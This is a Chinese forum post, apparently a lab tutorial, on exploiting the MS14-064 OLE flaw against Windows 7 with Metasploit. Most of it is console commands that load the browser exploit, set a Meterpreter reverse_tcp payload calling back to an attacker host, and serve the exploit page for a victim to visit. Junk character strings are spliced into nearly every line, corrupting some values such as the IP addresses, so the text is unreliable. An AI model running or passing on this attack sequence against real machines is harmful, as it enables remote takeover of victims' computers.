找回密码
 立即注册
查看: 2632|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

- ]" R4 D! k ^' m' ~ 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 8 q9 ^, E3 ?) A. ?) Q

: Z- B; i, @$ s) J

7 q' a! b; |0 q 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 5 g; ~% Z0 J; h; v; o# ?4 O

8 I7 z. k5 H4 h. d8 ~- e& m- F

+ t7 ? m/ N! [ 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp% p3 t3 |4 ~% m: K- I7 q% h; u/ s

0 a, ?8 k1 A& j4 P8 t: E$ K& k

4 C. N- U3 x/ d6 `             set AllowPowershellPrompt true: a+ G9 g( b( w. W5 j

: y- @* h- P4 A0 r

* V$ t/ e3 u. ]) z I% n8 [             Set LHOST 192.168.0.1097 t! |7 Y, F/ j) G j2 Q5 b

2 h" d: ~% r* u' N& A

9 G! y3 U4 A$ c             set SRVHOST 192.168.0.1092 p* d8 @" e8 }9 ?& g9 d! @0 x

: S+ _. J) s+ w% [8 s$ P

4 v$ _/ Y! b- m8 U3 `% A2 o             Set uripath share! L4 ~% b/ _/ O9 s1 g

/ A% ]/ L4 S: X! w* u! k8 B

& d* g) p* b1 G! a             Set srvport 80 - y% T" j1 {, `- X

6 X# z: g* _: @- D& G: ~8 T8 y

+ ~# K* c; t. l7 `7 O  4 H" B9 L0 y7 k/ d5 ]* }$ F

7 `# s5 v% x, b* Z# V) b' }

, ]1 H' r( |# u7 J' \   ) G7 v+ F/ b1 I3 j$ K

& L5 h6 z8 f+ b3 I: V4 c9 m6 m% ^) Y! h

, E) }- g4 m* e) W& Y4 \7 i- `  6 [; x. Q1 o3 E4 T n

& X% l! p- @) q6 B" N3 k

$ H4 g. n; T3 w# Q  9 p7 R0 L9 W5 \+ M6 i

" K9 P% B( j8 f4 {; C& R# x

/ ~* s; B! l. M! m: I) {1 j% `  , t0 i. t3 `, y, |& j

8 ]! m7 C4 g; Q0 s9 b

2 Q5 V" o0 R8 q/ g 下面我们来访问本地地址如图: % k- `0 [: d" |# r8 `

. ~7 a1 M R- q

' N) \2 o. a) W% ?) Z+ ]* u   9 P# F0 C7 K- J" J7 E

9 e! ~0 v" y& l4 G4 X8 s

' v( I( d; C& D/ B. A E5 E   6 w& S1 g1 G4 l( v% _1 l6 d

; S; v) i5 Y2 R7 i- b$ v _

; x( Z2 D- c5 c, K4 G) y" }1 w 3 x1 s$ X1 k3 x6 M/ J

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表